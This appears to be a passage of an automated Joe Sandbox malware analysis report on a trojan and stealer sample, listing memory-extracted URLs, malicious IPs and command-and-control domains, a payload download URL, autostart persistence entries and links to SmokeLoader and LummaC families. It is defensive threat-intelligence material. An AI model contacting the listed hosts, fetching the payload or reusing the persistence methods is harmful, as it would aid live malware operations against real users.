http://www.founder.com.cn/cn/cThe	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.2777085480.000002EC3E13C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsps.ssl.com0_	BD9E.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1716518107.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BD9E.exe, 0000000A.00000002.2843609071.000001DCCE071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2E0D1000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000012.00000002.4114379558.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://rentry.co	BD9E.exe, 0000000A.00000002.2843609071.000001DCCE409000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.oberhumer.com	2FBE.exe, 2FBE.exe.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1716518107.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1716518107.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 0000000E.00000002.2733250356.000002EC2E501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2F533000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1716518107.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.2733250356.000002EC2E2F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000E.00000002.2733250356.000002EC2E501000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/q	lm.exe, 00000013.00000003.2736909869.0000000000611000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736615115.0000000000610000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://store4.gofile.io	powershell.exe, 0000000E.00000002.2733250356.000002EC2E2F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2F78B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.2733250356.000002EC2E2F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 0000000E.00000002.2733250356.000002EC2FAC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mic	powershell.exe, 0000000E.00000002.2783985099.000002EC464C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.2777085480.000002EC3E13C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://liernessfornicsa.shop/apii	lm.exe, 00000013.00000003.2951586397.0000000000610000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000002.3159798781.0000000000610000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2950433978.0000000000610000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0	BD9E.exe.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 0000000D.00000003.2645280631.0000000004F61000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2788579586.000000000313C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	BitLockerToGo.exe, 0000000D.00000003.2616014173.0000000004F9C000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2739860037.0000000003173000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2741746788.0000000003173000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2737079544.0000000003346000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	lm.exe, 00000013.00000003.2789712158.0000000003568000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.2733250356.000002EC2E2F7000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop:443/api	BitLockerToGo.exe, 0000000D.00000003.2631526881.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2632557485.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp	false	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/N	lm.exe, 00000013.00000003.2736909869.0000000000611000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736615115.0000000000610000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/S	lm.exe, 00000013.00000002.3175149094.0000000003100000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1716518107.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.microsof	BitLockerToGo.exe, 0000000D.00000003.2616014173.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2737079544.0000000003346000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000E.00000002.2733250356.000002EC2E501000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1716518107.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	lm.exe, 00000013.00000003.2737691156.000000000314F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/	BitLockerToGo.exe, 0000000D.00000002.2710534110.0000000003021000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666659329.000000000301D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666787335.0000000003020000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2632557485.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2706400829.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2666377646.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://html4/loose.dtd	34CA.exe, 00000008.00000002.2600393793.00007FF65BB53000.00000008.00000001.01000000.00000007.sdmp, 34CA.exe, 00000008.00000000.2466754046.00007FF65BB44000.00000008.00000001.01000000.00000007.sdmp, 34CA.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/apiH7%	lm.exe, 00000013.00000002.3181333453.0000000003340000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.221.157.163	unknown	Russian Federation	30968	INFOBOX-ASInfoboxruAutonomousSystemRU	true
107.173.160.139	unknown	United States	36352	AS-COLOCROSSINGUS	true
107.173.160.137	unknown	United States	36352	AS-COLOCROSSINGUS	true
172.67.213.85	liernessfornicsa.shop	United States	13335	CLOUDFLARENETUS	true
162.0.235.84	funrecipebooks.com	Canada	22612	NAMECHEAP-NETUS	true
109.172.114.212	unknown	Russian Federation	41691	SUMTEL-AS-RIPEMoscowRussiaRU	true
64.190.113.113	unknown	United States	26646	TRAVELCLICKCORP1US	true
94.156.79.190	unknown	Bulgaria	43561	NET1-ASBG	true
188.114.97.3	callosallsaospz.shop	European Union	13335	CLOUDFLARENETUS	true
78.89.199.216	unknown	Kuwait	29357	WATANIYATELECOM-ASKW	true
104.26.2.16	rentry.co	United States	13335	CLOUDFLARENETUS	true
167.235.128.153	unknown	United States	3525	ALBERTSONSUS	true
193.222.96.24	unknown	Germany	3303	SWISSCOMSwisscomSwitzerlandLtdCH	true
185.149.100.242	mussangroup.com	Turkey	209853	VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi	true
31.14.70.245	store4.gofile.io	Virgin Islands (BRITISH)	199483	LINKER-ASFR	false
190.12.87.61	unknown	Peru	27843	OPTICALTECHNOLOGIESSACPE	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483397
Start date and time:	2024-07-27 08:52:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FpiUD4nYpj.exe renamed because original name is a hash value
Original Sample Name:	8f183d95f41f213f3413f7c59f58241f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@40/44@11/16
EGA Information:	Successful, ratio: 77.8%
HCA Information:	Successful, ratio: 81% Number of executed functions: 46 Number of non-executed functions: 59
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 34CA.exe, PID 6796 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1696 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:53:05	API Interceptor	297114x Sleep call for process: explorer.exe modified
02:54:31	API Interceptor	7x Sleep call for process: BitLockerToGo.exe modified
02:54:31	API Interceptor	39x Sleep call for process: powershell.exe modified
02:54:43	API Interceptor	7x Sleep call for process: lm.exe modified
02:54:51	API Interceptor	1x Sleep call for process: BD9E.exe modified
02:55:23	API Interceptor	2x Sleep call for process: WerFault.exe modified
07:53:20	Task Scheduler	Run new task: Firefox Default Browser Agent 33B21341E0679F10 path: C:\Users\user\AppData\Roaming\jjistfr
07:54:42	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs
07:55:31	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#0005_8yUscnjrUY C:\Users\user\AppData\Local\Temp\2FBE.exe
07:55:40	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#0005_8yUscnjrUY C:\Users\user\AppData\Local\Temp\2FBE.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77.221.157.163	EA17eA1pkG.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	77.221.157.163/systemd.exe
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	77.221.157.163/systemd.exe
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
107.173.160.139	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse
107.173.160.137	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mzxn.ru	EA17eA1pkG.exe	Get hash	malicious	SmokeLoader	Browse	179.27.75.59
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	186.145.236.93
	file.exe	Get hash	malicious	SmokeLoader	Browse	211.181.24.133
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	186.145.236.93
funrecipebooks.com	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	162.0.235.84
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	162.0.235.84
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	162.0.235.84
liernessfornicsa.shop	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	172.67.213.85
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	172.67.213.85
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.213.85
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	172.67.213.85
	1qlzPN3oeX.exe	Get hash	malicious	LummaC	Browse	104.21.77.246
	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.213.85
store4.gofile.io	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	31.14.70.245
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	w85VkFOxiD.exe	Get hash	malicious	Python Stealer, CStealer, NiceRAT, Quasar	Browse	31.14.70.245
	9afaXJv52z.exe	Get hash	malicious	Exela Stealer	Browse	31.14.70.245
	NoBackend.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	Microsoft_Teams_SC.ba#.bat	Get hash	malicious	Unknown	Browse	31.14.70.245
	c0PZAXHMCpdh5F1.exe	Get hash	malicious	Clipboard Hijacker, Redline Clipper, Stealerium	Browse	31.14.70.245
	5a7TEjoYQp.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	wins9c8hG6.exe	Get hash	malicious	Raccoon Stealer v2, Xmrig	Browse	31.14.70.245
rentry.co	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	104.26.3.16
	allchecker.exe	Get hash	malicious	Python Stealer, CStealer	Browse	172.67.75.40
	QMe7JpPtde.exe	Get hash	malicious	Unknown	Browse	104.26.2.16
	cliente.exe	Get hash	malicious	Unknown	Browse	172.67.75.40
	S982i1J0Uk.msi	Get hash	malicious	Unknown	Browse	104.26.3.16
	cliente.exe	Get hash	malicious	Unknown	Browse	104.26.3.16
	8998BC9FAF52DAB072698E932593819BFD772EE5C0C4519F30ECD55DE363505A.exe	Get hash	malicious	Bdaejec	Browse	104.26.3.16
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.3.16
	Adobe-GenP.exe	Get hash	malicious	Unknown	Browse	104.26.2.16

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INFOBOX-ASInfoboxruAutonomousSystemRU	EA17eA1pkG.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	77.221.157.163
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	77.221.157.163
	file.exe	Get hash	malicious	Unknown	Browse	109.120.137.52
	s6K4JjTwtz.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	IrJIw2lsaB.msi	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	ptuNVk3HeK.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	Qnwce6AQX2.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	cLi4FZejpP.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	uf0VrlE1bR.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
CLOUDFLARENETUS	8SxJ9aYfJ1.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.96.3
	https://www.kudoboard.com/boards/ZWwsi9jg	Get hash	malicious	Unknown	Browse	172.67.37.149
